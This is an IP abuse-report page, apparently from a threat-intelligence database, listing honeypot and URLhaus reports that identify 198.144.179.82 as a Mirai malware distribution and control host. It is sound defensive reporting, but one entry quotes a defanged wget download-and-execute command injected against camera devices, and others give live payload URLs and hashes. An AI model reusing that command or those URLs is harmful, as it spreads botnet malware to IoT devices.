Log in to view charts and search reports for this IP.
Log In
Top Reporter Countries (Last 60 Days)
Example preview
Report Categories (Last 60 Days)
Example preview
Reports Activity
Example preview
Account required for the enhanced features
Log inSign up
IP Abuse Reports for 198.144.179.82:
This IP address has been reported a total of
15
times from
9 distinct
sources.
198.144.179.82 was first reported on
, and the most recent report was
.
In the last 60 days, the top reporter locations were:
United States of America
with 11
reports;
Japan
with 1
report;
Serbia
with 1
report.
The most common categories in these recent reports were:
Exploited Host
13
times;
Hacking
9
times;
IoT Targeted
2
times;
Port Scan
1
time;
Brute-Force
1
time;
Other
1
time.
Recent Reports
We have received reports of abusive activity from this IP address within the last week. It is
potentially still actively engaged in abusive activities.
Telnet honeypot observed this address advertised as a potential malware payload host in 1 compromise ...
show moreTelnet honeypot observed this address advertised as a potential malware payload host in 1 compromise session from 1 source IP. Transfer methods: curl, wget. Observed ports: 80. Requested paths: /1.sh. Payload hosting was not independently verified.
show less
Malware distribution host on port 80. This IP served a confirmed malicious binary (wfnfx0jbvdrr6gsu3 ...
show moreMalware distribution host on port 80. This IP served a confirmed malicious binary (wfnfx0jbvdrr6gsu3nnlweljz6jiiqbg) that was downloaded into our honeypot by an attacker during a session on 2026-09-03 (UTC). Sample SHA-256: 1d64be0ba1bd9924c3e29ae460db9407e4e33afeb864c9e39377ae4a87fa09db, flagged by 26 engines on VirusTotal. Reported for hosting malicious content, not for connecting to us.
show less
Exploited Host
Anonymous
Malware distribution / command-and-control host.
This IP did not connect to our web server itself. I ...
show moreMalware distribution / command-and-control host.
This IP did not connect to our web server itself. It was found inside attack payloads delivered to our site: 2 payloads from 2 distinct source IPs between 2026-08-23 - 2026-08-31 (UTC).
The payloads instruct the compromised target to download and execute code hosted on this IP.
Referenced URLs, defanged: hxxp[:]//198[.]144[.]179[.]82:80/1[.]sh, hxxp[:]//198[.]144[.]179[.]82:80/1[.]sh;#.
Full instruction as delivered (percent-decoded, defanged): "wget -q -O 1.sh hxxp[:]//198[.]144[.]179[.]82:80/1[.]sh;)</language> Host [our server] Content-Length 139 Content-Type text/xml /SDK/webLanguage".
Delivery vector observed: exploitation attempt against IoT/camera devices.
The source IPs that delivered these to us: 176.105.202.183, 49.207.2.134.
All of those requests were denied with HTTP 403. All timestamps are UTC.
show less
Malware payload host (Mirai). observed via URLhaus ref #3904514. first seen 14d ago. sample URL: htt ...
show moreMalware payload host (Mirai). observed via URLhaus ref #3904514. first seen 14d ago. sample URL: http://198.144.179.82/m68k. Source: URLhaus (https://urlhaus.abuse.ch/).
show less
Malware distribution host: served a real malware payload we captured live (confirmed) via a self-hos ...
show moreMalware distribution host: served a real malware payload we captured live (confirmed) via a self-hosted honeypot (dropper). Observed 2026-08-28T22:49:52Z (UTC).
show less
Malware distribution host: served a real malware payload we captured live (confirmed) via a self-hos ...
show moreMalware distribution host: served a real malware payload we captured live (confirmed) via a self-hosted honeypot (dropper). Observed 2026-08-28T22:34:08Z (UTC).
show less
Malware distribution host: served a real malware payload we captured live (confirmed) via a self-hos ...
show moreMalware distribution host: served a real malware payload we captured live (confirmed) via a self-hosted honeypot (dropper). Observed 2026-08-28T22:18:49Z (UTC).
show less
Malware distribution host: served a real malware payload we captured live (confirmed) via a self-hos ...
show moreMalware distribution host: served a real malware payload we captured live (confirmed) via a self-hosted honeypot (dropper). Observed 2026-08-28T00:34:33Z (UTC).
show less
Malware distribution host: served a real malware payload we captured live (confirmed) via a self-hos ...
show moreMalware distribution host: served a real malware payload we captured live (confirmed) via a self-hosted honeypot (dropper). Observed 2026-08-26T13:54:00Z (UTC).
show less
Malware payload hosting observed during a multi-architecture IoT botnet campaign. A captured shell d ...
show moreMalware payload hosting observed during a multi-architecture IoT botnet campaign. A captured shell dropper with SHA-256 1d64be0ba1bd9924c3e29ae460db9407e4e33afeb864c9e39377ae4a87fa09db retrieved architecture-specific executables from this host over TCP port 80. Captured by a Cowrie honeypot.
show less
Malware distribution / C2 host: seen in 15 dropper fetch commands captured by a self-hosted honeypot ...
show moreMalware distribution / C2 host: seen in 15 dropper fetch commands captured by a self-hosted honeypot (dropper). Observed 2026-08-24T23:02:35Z (UTC).
show less
Automated sensor: 1 port 58916 connection/probe attempts over the last 24h (latest 2026-08-21T07:31Z ...
show moreAutomated sensor: 1 port 58916 connection/probe attempts over the last 24h (latest 2026-08-21T07:31Z).
show less
Malware payload host (mirai). observed via URLhaus ref #3904514. first seen 0d ago. sample URL: http ...
show moreMalware payload host (mirai). observed via URLhaus ref #3904514. first seen 0d ago. sample URL: http://198.144.179.82/m68k. Source: URLhaus (https://urlhaus.abuse.ch/).
show less